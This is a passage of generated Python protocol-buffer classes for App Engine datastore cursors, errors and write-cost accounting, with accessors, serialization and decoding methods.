    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  # --- start_key (optional string 27) accessors ---

  def start_key(self): return self.start_key_

  def set_start_key(self, x):
    self.has_start_key_ = 1
    self.start_key_ = x

  def clear_start_key(self):
    if self.has_start_key_:
      self.has_start_key_ = 0
      self.start_key_ = ""

  def has_start_key(self): return self.has_start_key_

  # --- indexvalue (repeated group 29) accessors ---

  def indexvalue_size(self): return len(self.indexvalue_)
  def indexvalue_list(self): return self.indexvalue_

  def indexvalue(self, i):
    return self.indexvalue_[i]

  def mutable_indexvalue(self, i):
    return self.indexvalue_[i]

  def add_indexvalue(self):
    x = CompiledCursor_PositionIndexValue()
    self.indexvalue_.append(x)
    return x

  def clear_indexvalue(self):
    self.indexvalue_ = []
  def key(self):
    # Lazily create the optional sub-message under the init lock
    # (double-checked: test, acquire, test again).
    if self.key_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.key_ is None: self.key_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.key_

  def mutable_key(self): self.has_key_ = 1; return self.key()

  def clear_key(self):
    # Keep the allocated sub-message (just Clear it) so later reuse
    # avoids re-allocation.
    if self.has_key_:
      self.has_key_ = 0;
      if self.key_ is not None: self.key_.Clear()

  def has_key(self): return self.has_key_

  # --- start_inclusive (optional bool 28, default true) accessors ---

  def start_inclusive(self): return self.start_inclusive_

  def set_start_inclusive(self, x):
    self.has_start_inclusive_ = 1
    self.start_inclusive_ = x

  def clear_start_inclusive(self):
    if self.has_start_inclusive_:
      self.has_start_inclusive_ = 0
      self.start_inclusive_ = 1

  def has_start_inclusive(self): return self.has_start_inclusive_

  # --- before_ascending (optional bool 33) accessors ---

  def before_ascending(self): return self.before_ascending_

  def set_before_ascending(self, x):
    self.has_before_ascending_ = 1
    self.before_ascending_ = x

  def clear_before_ascending(self):
    if self.has_before_ascending_:
      self.has_before_ascending_ = 0
      self.before_ascending_ = 0

  def has_before_ascending(self): return self.has_before_ascending_


  def MergeFrom(self, x):
    """Merge every set field of another Position `x` into self; repeated
    indexvalue entries are appended."""
    assert x is not self
    if (x.has_start_key()): self.set_start_key(x.start_key())
    for i in xrange(x.indexvalue_size()): self.add_indexvalue().CopyFrom(x.indexvalue(i))
    if (x.has_key()): self.mutable_key().MergeFrom(x.key())
    if (x.has_start_inclusive()): self.set_start_inclusive(x.start_inclusive())
    if (x.has_before_ascending()): self.set_before_ascending(x.before_ascending())

  def Equals(self, x):
    """Field-by-field equality; returns 1/0."""
    if x is self: return 1
    if self.has_start_key_ != x.has_start_key_: return 0
    if self.has_start_key_ and self.start_key_ != x.start_key_: return 0
    if len(self.indexvalue_) != len(x.indexvalue_): return 0
    for e1, e2 in zip(self.indexvalue_, x.indexvalue_):
      if e1 != e2: return 0
    if self.has_key_ != x.has_key_: return 0
    if self.has_key_ and self.key_ != x.key_: return 0
    if self.has_start_inclusive_ != x.has_start_inclusive_: return 0
    if self.has_start_inclusive_ and self.start_inclusive_ != x.start_inclusive_: return 0
    if self.has_before_ascending_ != x.has_before_ascending_: return 0
    if self.has_before_ascending_ and self.before_ascending_ != x.before_ascending_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff all present sub-messages are initialized (this message
    has no required scalar fields of its own)."""
    initialized = 1
    for p in self.indexvalue_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_key_ and not self.key_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    """Exact serialized size in bytes."""
    n = 0
    if (self.has_start_key_): n += 2 + self.lengthString(len(self.start_key_))
    # 4 bytes per repeated indexvalue: 2-byte start tag (235) + 2-byte
    # end tag (236).
    n += 4 * len(self.indexvalue_)
    for i in xrange(len(self.indexvalue_)): n += self.indexvalue_[i].ByteSize()
    if (self.has_key_): n += 2 + self.lengthString(self.key_.ByteSize())
    if (self.has_start_inclusive_): n += 3
    if (self.has_before_ascending_): n += 3
    return n

  def ByteSizePartial(self):
    """Serialized size counting only fields that are actually set."""
    n = 0
    if (self.has_start_key_): n += 2 + self.lengthString(len(self.start_key_))
    n += 4 * len(self.indexvalue_)
    for i in xrange(len(self.indexvalue_)): n += self.indexvalue_[i].ByteSizePartial()
    if (self.has_key_): n += 2 + self.lengthString(self.key_.ByteSizePartial())
    if (self.has_start_inclusive_): n += 3
    if (self.has_before_ascending_): n += 3
    return n

  def Clear(self):
    """Reset every field to its default state."""
    self.clear_start_key()
    self.clear_indexvalue()
    self.clear_key()
    self.clear_start_inclusive()
    self.clear_before_ascending()

  def OutputUnchecked(self, out):
    """Serialize all set fields to encoder `out` (no required fields here,
    so this matches OutputPartial except for size/serialize variants)."""
    if (self.has_start_key_):
      out.putVarInt32(218)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(224)
      out.putBoolean(self.start_inclusive_)
    for i in xrange(len(self.indexvalue_)):
      out.putVarInt32(235)
      self.indexvalue_[i].OutputUnchecked(out)
      out.putVarInt32(236)
    if (self.has_key_):
      out.putVarInt32(258)
      out.putVarInt32(self.key_.ByteSize())
      self.key_.OutputUnchecked(out)
    if (self.has_before_ascending_):
      out.putVarInt32(264)
      out.putBoolean(self.before_ascending_)

  def OutputPartial(self, out):
    """Like OutputUnchecked, using the Partial size/serialize variants for
    nested messages."""
    if (self.has_start_key_):
      out.putVarInt32(218)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(224)
      out.putBoolean(self.start_inclusive_)
    for i in xrange(len(self.indexvalue_)):
      out.putVarInt32(235)
      self.indexvalue_[i].OutputPartial(out)
      out.putVarInt32(236)
    if (self.has_key_):
      out.putVarInt32(258)
      out.putVarInt32(self.key_.ByteSizePartial())
      self.key_.OutputPartial(out)
    if (self.has_before_ascending_):
      out.putVarInt32(264)
      out.putBoolean(self.before_ascending_)

  def TryMerge(self, d):
    """Merge fields decoded from `d` until the enclosing group's END_GROUP
    tag (20) is read. Unknown tags are skipped; tag 0 raises."""
    while 1:
      tt = d.getVarInt32()
      if tt == 20: break
      if tt == 218:
        self.set_start_key(d.getPrefixedString())
        continue
      if tt == 224:
        self.set_start_inclusive(d.getBoolean())
        continue
      if tt == 235:
        self.add_indexvalue().TryMerge(d)
        continue
      if tt == 258:
        # Length-delimited sub-message: parse from a bounded sub-decoder.
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_key().TryMerge(tmp)
        continue
      if tt == 264:
        self.set_before_ascending(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Return a human-readable text dump of set fields; repeated elements
    are numbered when `printElemNumber` is truthy."""
    res=""
    if self.has_start_key_: res+=prefix+("start_key: %s\n" % self.DebugFormatString(self.start_key_))
    cnt=0
    for e in self.indexvalue_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("IndexValue%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_key_:
      res+=prefix+"key <\n"
      res+=self.key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_start_inclusive_: res+=prefix+("start_inclusive: %s\n" % self.DebugFormatBool(self.start_inclusive_))
    if self.has_before_ascending_: res+=prefix+("before_ascending: %s\n" % self.DebugFormatBool(self.before_ascending_))
    return res

class CompiledCursor(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.CompiledCursor.

  Carries a query cursor in one of three encodings: the legacy
  Position group (field 2), postfix_position (IndexPostfix, field 1),
  or absolute_position (IndexPosition, field 3).

  NOTE(review): machine-generated protocol-buffer code.  The output
  order and tag constants below define the wire format; regenerate
  from the .proto rather than hand-editing.
  """
  # Presence flag + lazily-built sub-message slot for each optional field.
  has_position_ = 0
  position_ = None
  has_postfix_position_ = 0
  postfix_position_ = None
  has_absolute_position_ = 0
  absolute_position_ = None

  def __init__(self, contents=None):
    # Lock serializes lazy creation of the sub-messages above.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def position(self):
    # Lazily create the sub-message (double-checked under the lock) so
    # reading an unset field never returns None and never races.
    if self.position_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.position_ is None: self.position_ = CompiledCursor_Position()
      finally:
        self.lazy_init_lock_.release()
    return self.position_

  def mutable_position(self): self.has_position_ = 1; return self.position()

  def clear_position(self):

    # Clears the presence bit but reuses the existing sub-message object.
    if self.has_position_:
      self.has_position_ = 0;
      if self.position_ is not None: self.position_.Clear()

  def has_position(self): return self.has_position_

  def postfix_position(self):
    # Same lazy double-checked creation pattern as position().
    if self.postfix_position_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.postfix_position_ is None: self.postfix_position_ = IndexPostfix()
      finally:
        self.lazy_init_lock_.release()
    return self.postfix_position_

  def mutable_postfix_position(self): self.has_postfix_position_ = 1; return self.postfix_position()

  def clear_postfix_position(self):

    if self.has_postfix_position_:
      self.has_postfix_position_ = 0;
      if self.postfix_position_ is not None: self.postfix_position_.Clear()

  def has_postfix_position(self): return self.has_postfix_position_

  def absolute_position(self):
    # Same lazy double-checked creation pattern as position().
    if self.absolute_position_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.absolute_position_ is None: self.absolute_position_ = IndexPosition()
      finally:
        self.lazy_init_lock_.release()
    return self.absolute_position_

  def mutable_absolute_position(self): self.has_absolute_position_ = 1; return self.absolute_position()

  def clear_absolute_position(self):

    if self.has_absolute_position_:
      self.has_absolute_position_ = 0;
      if self.absolute_position_ is not None: self.absolute_position_.Clear()

  def has_absolute_position(self): return self.has_absolute_position_


  def MergeFrom(self, x):
    """Merge every set field of x (another CompiledCursor) into self."""
    assert x is not self
    if (x.has_position()): self.mutable_position().MergeFrom(x.position())
    if (x.has_postfix_position()): self.mutable_postfix_position().MergeFrom(x.postfix_position())
    if (x.has_absolute_position()): self.mutable_absolute_position().MergeFrom(x.absolute_position())

  def Equals(self, x):
    """Field-by-field equality; presence bits must match too."""
    if x is self: return 1
    if self.has_position_ != x.has_position_: return 0
    if self.has_position_ and self.position_ != x.position_: return 0
    if self.has_postfix_position_ != x.has_postfix_position_: return 0
    if self.has_postfix_position_ and self.postfix_position_ != x.postfix_position_: return 0
    if self.has_absolute_position_ != x.has_absolute_position_: return 0
    if self.has_absolute_position_ and self.absolute_position_ != x.absolute_position_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff every set sub-message is itself initialized."""
    initialized = 1
    if (self.has_position_ and not self.position_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_postfix_position_ and not self.postfix_position_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_absolute_position_ and not self.absolute_position_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # Position is a group: 2 bytes for its START/END tags.  The other
    # two are length-delimited: 1 tag byte + varint length prefix.
    n = 0
    if (self.has_position_): n += 2 + self.position_.ByteSize()
    if (self.has_postfix_position_): n += 1 + self.lengthString(self.postfix_position_.ByteSize())
    if (self.has_absolute_position_): n += 1 + self.lengthString(self.absolute_position_.ByteSize())
    return n

  def ByteSizePartial(self):
    # Like ByteSize, but tolerates missing required sub-fields.
    n = 0
    if (self.has_position_): n += 2 + self.position_.ByteSizePartial()
    if (self.has_postfix_position_): n += 1 + self.lengthString(self.postfix_position_.ByteSizePartial())
    if (self.has_absolute_position_): n += 1 + self.lengthString(self.absolute_position_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_position()
    self.clear_postfix_position()
    self.clear_absolute_position()

  def OutputUnchecked(self, out):
    """Serialize to Encoder `out`; caller guarantees IsInitialized."""
    if (self.has_postfix_position_):
      # Field 1, length-delimited (tag 10).
      out.putVarInt32(10)
      out.putVarInt32(self.postfix_position_.ByteSize())
      self.postfix_position_.OutputUnchecked(out)
    if (self.has_position_):
      # Field 2, group: START_GROUP (19) ... END_GROUP (20).
      out.putVarInt32(19)
      self.position_.OutputUnchecked(out)
      out.putVarInt32(20)
    if (self.has_absolute_position_):
      # Field 3, length-delimited (tag 26).
      out.putVarInt32(26)
      out.putVarInt32(self.absolute_position_.ByteSize())
      self.absolute_position_.OutputUnchecked(out)

  def OutputPartial(self, out):
    """Like OutputUnchecked, but skips uninitialized required sub-fields."""
    if (self.has_postfix_position_):
      out.putVarInt32(10)
      out.putVarInt32(self.postfix_position_.ByteSizePartial())
      self.postfix_position_.OutputPartial(out)
    if (self.has_position_):
      out.putVarInt32(19)
      self.position_.OutputPartial(out)
      out.putVarInt32(20)
    if (self.has_absolute_position_):
      out.putVarInt32(26)
      out.putVarInt32(self.absolute_position_.ByteSizePartial())
      self.absolute_position_.OutputPartial(out)

  def TryMerge(self, d):
    """Decode fields from Decoder `d` until the buffer is exhausted."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        # postfix_position: length-prefixed sub-message.
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_postfix_position().TryMerge(tmp)
        continue
      if tt == 19:
        # Position group: sub-message consumes up to END_GROUP (20).
        self.mutable_position().TryMerge(d)
        continue
      if tt == 26:
        # absolute_position: length-prefixed sub-message.
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_absolute_position().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text."""
    res=""
    if self.has_position_:
      res+=prefix+"Position {\n"
      res+=self.position_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    if self.has_postfix_position_:
      res+=prefix+"postfix_position <\n"
      res+=self.postfix_position_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_absolute_position_:
      res+=prefix+"absolute_position <\n"
      res+=self.absolute_position_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  # Invoked as a plain function during class creation to build the
  # dense tag->value tuples below; not an instance method.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants (kPositionIndexValue* belong to the nested
  # IndexValue group inside the Position group).
  kPositionGroup = 2
  kPositionstart_key = 27
  kPositionIndexValueGroup = 29
  kPositionIndexValueproperty = 30
  kPositionIndexValuevalue = 31
  kPositionkey = 32
  kPositionstart_inclusive = 28
  kPositionbefore_ascending = 33
  kpostfix_position = 1
  kabsolute_position = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "postfix_position",
    2: "Position",
    3: "absolute_position",
    27: "start_key",
    28: "start_inclusive",
    29: "IndexValue",
    30: "property",
    31: "value",
    32: "key",
    33: "before_ascending",
  }, 33)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STARTGROUP,
    3: ProtocolBuffer.Encoder.STRING,
    27: ProtocolBuffer.Encoder.STRING,
    28: ProtocolBuffer.Encoder.NUMERIC,
    29: ProtocolBuffer.Encoder.STARTGROUP,
    30: ProtocolBuffer.Encoder.STRING,
    31: ProtocolBuffer.Encoder.STRING,
    32: ProtocolBuffer.Encoder.STRING,
    33: ProtocolBuffer.Encoder.NUMERIC,
  }, 33, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CompiledCursor'
class Cursor(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.Cursor.

  Fields: cursor (required fixed64, field 1) and app (optional string,
  field 2).  NOTE(review): machine-generated protocol-buffer code;
  regenerate from the .proto rather than hand-editing.
  """
  # Presence flags and default values for the scalar fields.
  has_cursor_ = 0
  cursor_ = 0
  has_app_ = 0
  app_ = ""

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def cursor(self): return self.cursor_

  def set_cursor(self, x):
    self.has_cursor_ = 1
    self.cursor_ = x

  def clear_cursor(self):
    if self.has_cursor_:
      self.has_cursor_ = 0
      self.cursor_ = 0

  def has_cursor(self): return self.has_cursor_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_


  def MergeFrom(self, x):
    """Copy every set field of x (another Cursor) into self."""
    assert x is not self
    if (x.has_cursor()): self.set_cursor(x.cursor())
    if (x.has_app()): self.set_app(x.app())

  def Equals(self, x):
    """Field-by-field equality; presence bits must match too."""
    if x is self: return 1
    if self.has_cursor_ != x.has_cursor_: return 0
    if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # cursor is the message's only required field.
    initialized = 1
    if (not self.has_cursor_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: cursor not set.')
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_app_): n += 1 + self.lengthString(len(self.app_))
    return n + 9  # required fixed64 cursor: 1 tag byte + 8 data bytes

  def ByteSizePartial(self):
    # Unlike ByteSize, only counts cursor when it is actually set.
    n = 0
    if (self.has_cursor_):
      n += 9
    if (self.has_app_): n += 1 + self.lengthString(len(self.app_))
    return n

  def Clear(self):
    self.clear_cursor()
    self.clear_app()

  def OutputUnchecked(self, out):
    """Serialize to Encoder `out`; cursor is written unconditionally."""
    out.putVarInt32(9)
    out.put64(self.cursor_)
    if (self.has_app_):
      out.putVarInt32(18)
      out.putPrefixedString(self.app_)

  def OutputPartial(self, out):
    """Like OutputUnchecked, but omits cursor when unset."""
    if (self.has_cursor_):
      out.putVarInt32(9)
      out.put64(self.cursor_)
    if (self.has_app_):
      out.putVarInt32(18)
      out.putPrefixedString(self.app_)

  def TryMerge(self, d):
    """Decode fields from Decoder `d` until the buffer is exhausted."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 9:
        # Field 1 (cursor), fixed64.
        self.set_cursor(d.get64())
        continue
      if tt == 18:
        # Field 2 (app), length-prefixed string.
        self.set_app(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text."""
    res=""
    if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatFixed64(self.cursor_))
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    return res


  # Invoked as a plain function during class creation; not a method.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kcursor = 1
  kapp = 2

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cursor",
    2: "app",
  }, 2)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.DOUBLE,
    2: ProtocolBuffer.Encoder.STRING,
  }, 2, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Cursor'
class Error(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.Error.

  An empty message whose purpose is to carry the ErrorCode enum of
  datastore failure modes.  It has no fields, so serialization is a
  no-op and decoding merely skips (and validates) whatever it reads.
  """

  # ErrorCode enum values.
  BAD_REQUEST = 1
  CONCURRENT_TRANSACTION = 2
  INTERNAL_ERROR = 3
  NEED_INDEX = 4
  TIMEOUT = 5
  PERMISSION_DENIED = 6
  BIGTABLE_ERROR = 7
  COMMITTED_BUT_STILL_APPLYING = 8
  CAPABILITY_DISABLED = 9
  TRY_ALTERNATE_BACKEND = 10
  SAFE_TIME_TOO_OLD = 11

  _ErrorCode_NAMES = {
    1: "BAD_REQUEST",
    2: "CONCURRENT_TRANSACTION",
    3: "INTERNAL_ERROR",
    4: "NEED_INDEX",
    5: "TIMEOUT",
    6: "PERMISSION_DENIED",
    7: "BIGTABLE_ERROR",
    8: "COMMITTED_BUT_STILL_APPLYING",
    9: "CAPABILITY_DISABLED",
    10: "TRY_ALTERNATE_BACKEND",
    11: "SAFE_TIME_TOO_OLD",
  }

  @classmethod
  def ErrorCode_Name(cls, x):
    """Return the symbolic name for enum value x, or "" if unknown."""
    return cls._ErrorCode_NAMES.get(x, "")

  def __init__(self, contents=None):
    if contents is not None:
      self.MergeFromString(contents)

  def MergeFrom(self, x):
    # Nothing to merge; guard against accidental self-merge anyway.
    assert x is not self

  def Equals(self, x):
    # All Error instances are equal: there are no fields to compare.
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields, so always initialized.
    return 1

  def ByteSize(self):
    return 0

  def ByteSizePartial(self):
    return 0

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    # No known fields: skip everything, but reject a corrupt zero tag.
    while d.avail() > 0:
      tag = d.getVarInt32()
      if tag == 0:
        raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tag)

  def __str__(self, prefix="", printElemNumber=0):
    return ""

  # Invoked as a plain function during class creation; not a method.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple(sparse.get(tag, default) for tag in xrange(maxtag + 1))

  _TEXT = _BuildTagLookupTable({0: "ErrorCode"}, 0)

  _TYPES = _BuildTagLookupTable({0: ProtocolBuffer.Encoder.NUMERIC}, 0,
                                ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Error'
class Cost_CommitCost(ProtocolBuffer.ProtocolMessage):
  """Generated group apphosting_datastore_v3.Cost.CommitCost.

  Counts the entity puts and deletes requested by a commit.  Encoded
  as a *group* inside Cost (START_GROUP tag 43 / END_GROUP tag 44),
  which is why TryMerge terminates on tag 44 and the class carries no
  tag-lookup tables of its own (Cost's tables cover its fields).
  NOTE(review): machine-generated; regenerate rather than hand-edit.
  """
  # Presence flags and default values for the two varint fields.
  has_requested_entity_puts_ = 0
  requested_entity_puts_ = 0
  has_requested_entity_deletes_ = 0
  requested_entity_deletes_ = 0

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def requested_entity_puts(self): return self.requested_entity_puts_

  def set_requested_entity_puts(self, x):
    self.has_requested_entity_puts_ = 1
    self.requested_entity_puts_ = x

  def clear_requested_entity_puts(self):
    if self.has_requested_entity_puts_:
      self.has_requested_entity_puts_ = 0
      self.requested_entity_puts_ = 0

  def has_requested_entity_puts(self): return self.has_requested_entity_puts_

  def requested_entity_deletes(self): return self.requested_entity_deletes_

  def set_requested_entity_deletes(self, x):
    self.has_requested_entity_deletes_ = 1
    self.requested_entity_deletes_ = x

  def clear_requested_entity_deletes(self):
    if self.has_requested_entity_deletes_:
      self.has_requested_entity_deletes_ = 0
      self.requested_entity_deletes_ = 0

  def has_requested_entity_deletes(self): return self.has_requested_entity_deletes_


  def MergeFrom(self, x):
    """Copy every set field of x (another Cost_CommitCost) into self."""
    assert x is not self
    if (x.has_requested_entity_puts()): self.set_requested_entity_puts(x.requested_entity_puts())
    if (x.has_requested_entity_deletes()): self.set_requested_entity_deletes(x.requested_entity_deletes())

  def Equals(self, x):
    """Field-by-field equality; presence bits must match too."""
    if x is self: return 1
    if self.has_requested_entity_puts_ != x.has_requested_entity_puts_: return 0
    if self.has_requested_entity_puts_ and self.requested_entity_puts_ != x.requested_entity_puts_: return 0
    if self.has_requested_entity_deletes_ != x.has_requested_entity_deletes_: return 0
    if self.has_requested_entity_deletes_ and self.requested_entity_deletes_ != x.requested_entity_deletes_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields.
    initialized = 1
    return initialized

  def ByteSize(self):
    # Each set field costs 1 tag byte + its varint encoding.
    n = 0
    if (self.has_requested_entity_puts_): n += 1 + self.lengthVarInt64(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_): n += 1 + self.lengthVarInt64(self.requested_entity_deletes_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_requested_entity_puts_): n += 1 + self.lengthVarInt64(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_): n += 1 + self.lengthVarInt64(self.requested_entity_deletes_)
    return n

  def Clear(self):
    self.clear_requested_entity_puts()
    self.clear_requested_entity_deletes()

  def OutputUnchecked(self, out):
    """Serialize group body (tags 48 = field 6, 56 = field 7)."""
    if (self.has_requested_entity_puts_):
      out.putVarInt32(48)
      out.putVarInt32(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_):
      out.putVarInt32(56)
      out.putVarInt32(self.requested_entity_deletes_)

  def OutputPartial(self, out):
    # Identical to OutputUnchecked: both fields are optional scalars.
    if (self.has_requested_entity_puts_):
      out.putVarInt32(48)
      out.putVarInt32(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_):
      out.putVarInt32(56)
      out.putVarInt32(self.requested_entity_deletes_)

  def TryMerge(self, d):
    """Decode group body from Decoder `d` until END_GROUP tag 44."""
    while 1:
      tt = d.getVarInt32()
      if tt == 44: break
      if tt == 48:
        self.set_requested_entity_puts(d.getVarInt32())
        continue
      if tt == 56:
        self.set_requested_entity_deletes(d.getVarInt32())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text."""
    res=""
    if self.has_requested_entity_puts_: res+=prefix+("requested_entity_puts: %s\n" % self.DebugFormatInt32(self.requested_entity_puts_))
    if self.has_requested_entity_deletes_: res+=prefix+("requested_entity_deletes: %s\n" % self.DebugFormatInt32(self.requested_entity_deletes_))
    return res

class Cost(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.Cost.

  Write-cost accounting for a datastore operation: index/entity write
  counts and byte counts (fields 1-4), an optional CommitCost group
  (field 5), approximate_storage_delta (field 8) and
  id_sequence_updates (field 9).  NOTE(review): machine-generated
  protocol-buffer code; regenerate rather than hand-edit.
  """
  # Presence flags and defaults; commitcost_ is a lazily-built group.
  has_index_writes_ = 0
  index_writes_ = 0
  has_index_write_bytes_ = 0
  index_write_bytes_ = 0
  has_entity_writes_ = 0
  entity_writes_ = 0
  has_entity_write_bytes_ = 0
  entity_write_bytes_ = 0
  has_commitcost_ = 0
  commitcost_ = None
  has_approximate_storage_delta_ = 0
  approximate_storage_delta_ = 0
  has_id_sequence_updates_ = 0
  id_sequence_updates_ = 0

  def __init__(self, contents=None):
    # Lock serializes lazy creation of commitcost_.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def index_writes(self): return self.index_writes_

  def set_index_writes(self, x):
    self.has_index_writes_ = 1
    self.index_writes_ = x

  def clear_index_writes(self):
    if self.has_index_writes_:
      self.has_index_writes_ = 0
      self.index_writes_ = 0

  def has_index_writes(self): return self.has_index_writes_

  def index_write_bytes(self): return self.index_write_bytes_

  def set_index_write_bytes(self, x):
    self.has_index_write_bytes_ = 1
    self.index_write_bytes_ = x

  def clear_index_write_bytes(self):
    if self.has_index_write_bytes_:
      self.has_index_write_bytes_ = 0
      self.index_write_bytes_ = 0

  def has_index_write_bytes(self): return self.has_index_write_bytes_

  def entity_writes(self): return self.entity_writes_

  def set_entity_writes(self, x):
    self.has_entity_writes_ = 1
    self.entity_writes_ = x

  def clear_entity_writes(self):
    if self.has_entity_writes_:
      self.has_entity_writes_ = 0
      self.entity_writes_ = 0

  def has_entity_writes(self): return self.has_entity_writes_

  def entity_write_bytes(self): return self.entity_write_bytes_

  def set_entity_write_bytes(self, x):
    self.has_entity_write_bytes_ = 1
    self.entity_write_bytes_ = x

  def clear_entity_write_bytes(self):
    if self.has_entity_write_bytes_:
      self.has_entity_write_bytes_ = 0
      self.entity_write_bytes_ = 0

  def has_entity_write_bytes(self): return self.has_entity_write_bytes_

  def commitcost(self):
    # Lazily create the group (double-checked under the lock) so
    # reading an unset field never returns None and never races.
    if self.commitcost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.commitcost_ is None: self.commitcost_ = Cost_CommitCost()
      finally:
        self.lazy_init_lock_.release()
    return self.commitcost_

  def mutable_commitcost(self): self.has_commitcost_ = 1; return self.commitcost()

  def clear_commitcost(self):

    # Clears the presence bit but reuses the existing group object.
    if self.has_commitcost_:
      self.has_commitcost_ = 0;
      if self.commitcost_ is not None: self.commitcost_.Clear()

  def has_commitcost(self): return self.has_commitcost_

  def approximate_storage_delta(self): return self.approximate_storage_delta_

  def set_approximate_storage_delta(self, x):
    self.has_approximate_storage_delta_ = 1
    self.approximate_storage_delta_ = x

  def clear_approximate_storage_delta(self):
    if self.has_approximate_storage_delta_:
      self.has_approximate_storage_delta_ = 0
      self.approximate_storage_delta_ = 0

  def has_approximate_storage_delta(self): return self.has_approximate_storage_delta_

  def id_sequence_updates(self): return self.id_sequence_updates_

  def set_id_sequence_updates(self, x):
    self.has_id_sequence_updates_ = 1
    self.id_sequence_updates_ = x

  def clear_id_sequence_updates(self):
